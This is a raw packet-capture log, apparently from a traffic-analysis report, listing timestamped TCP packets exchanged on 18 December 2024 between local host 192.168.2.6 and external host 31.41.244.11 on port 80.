                                                                                                                                                                  Dec 18, 2024 11:09:12.471059084 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.471069098 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.471107960 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.472393036 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.472430944 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.472440004 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.472464085 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.473563910 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.473593950 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.473604918 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.473628044 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.474844933 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.474885941 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.474971056 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.475008011 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.476094961 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.476134062 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.597485065 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.597554922 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.597611904 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.597636938 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.598151922 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.598200083 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.598361015 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.598404884 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.599689960 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.599726915 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.599737883 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.599776030 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.600605011 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.600655079 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.600724936 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.600771904 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.601303101 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.601350069 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.601375103 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.601416111 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.602046013 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.602093935 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.602122068 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.602165937 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.602607012 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.602652073 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.602659941 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.602704048 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.603349924 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.603395939 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.603413105 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.603456974 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.604218006 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.604264021 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.604338884 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.604383945 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.605364084 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.605411053 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.605473995 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.605523109 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.606384993 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.606431007 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.606440067 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.606482029 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.607500076 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.607551098 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.607574940 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.607620955 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.608525991 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.608572960 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.608602047 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.608649015 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.609577894 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.609625101 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.609700918 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.609746933 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.610595942 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.610644102 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.610723019 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.610769033 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.611686945 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.611733913 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.611845016 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.611890078 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.612767935 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.612818956 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.612942934 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.612986088 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.613866091 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.613914967 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.613998890 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.614044905 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.615031004 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.615067005 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.615082979 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.615109921 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.615971088 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.616020918 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.616101027 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.616144896 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.617050886 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.617098093 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.617229939 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.617275953 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.618133068 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.618181944 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.618283033 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.618329048 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.619168997 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.619216919 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.619307041 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.619353056 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.620316029 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.620373964 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.620388985 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.620434046 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.621320009 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.621371984 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.621452093 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.621499062 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.622397900 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.622463942 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.622534037 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.622581959 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.626117945 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.626163960 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.626174927 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.626202106 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.626205921 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.626239061 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.626243114 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.626276016 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.626689911 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.626739979 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.626770020 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.626815081 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.627502918 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.627553940 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.627655029 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.627701998 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.628703117 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.628755093 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.628865957 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.628911972 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.629772902 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.629811049 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.629826069 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.629853010 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.630628109 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.630676985 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.630894899 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.630944014 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.631757975 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.631798983 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.631810904 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.631839991 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.632103920 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.632149935 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.632199049 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.632244110 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.633622885 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.633681059 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.634502888 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.634556055 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.635683060 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.635736942 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.635749102 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.635955095 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.635979891 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.636003017 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.636111975 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.636151075 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.637200117 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.637248993 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.637391090 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.637429953 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.638225079 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.638269901 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.638274908 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.638312101 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.638561010 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.638602018 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.638724089 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.638765097 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.639482021 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.639525890 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.640151024 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.640191078 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.641865015 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.641921997 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.641997099 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.642036915 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.642183065 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.642198086 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.642224073 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.642255068 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.642913103 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.642965078 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.642988920 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.643028975 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.644937992 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.644992113 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.645051003 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.645093918 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.646037102 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.646053076 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.646084070 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.646107912 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.646661997 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.646707058 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.646841049 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.646878958 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.647934914 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.647952080 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.647981882 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.648000956 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.648997068 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.649012089 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.649040937 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.649060011 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.649914980 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.649954081 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.650085926 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.650122881 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.651052952 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.651094913 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.651173115 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.651210070 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.651247025 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.651413918 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.651432991 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.651458979 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.652331114 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.652369022 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.787383080 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.787477016 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.787486076 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.787518978 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.788011074 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.788057089 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.788196087 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.788234949 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.789072990 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.789104939 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.789109945 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.789140940 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.790144920 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.790186882 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.790237904 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.790277958 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.791161060 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.791203022 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.791338921 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.791378975 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.792215109 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.792259932 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.792412043 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.792450905 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.793278933 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.793322086 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.793417931 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.793457031 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.794337988 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.794378996 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.794471979 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.794512987 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.795402050 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.795447111 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.795486927 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.795528889 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.796490908 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.796531916 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.796631098 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.796669960 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.797609091 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.797651052 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.797712088 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.797751904 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.798602104 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.798645020 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.798688889 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.798728943 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.799695015 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.799736977 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.799779892 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.799819946 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.800735950 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.800777912 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.800858021 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.800895929 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.801800966 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.801841974 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.801899910 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.801939964 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.802864075 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.802906036 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.802968025 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.803005934 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.803944111 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.803981066 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.804049969 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.804086924 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.805069923 CET804987731.41.244.11192.168.2.6
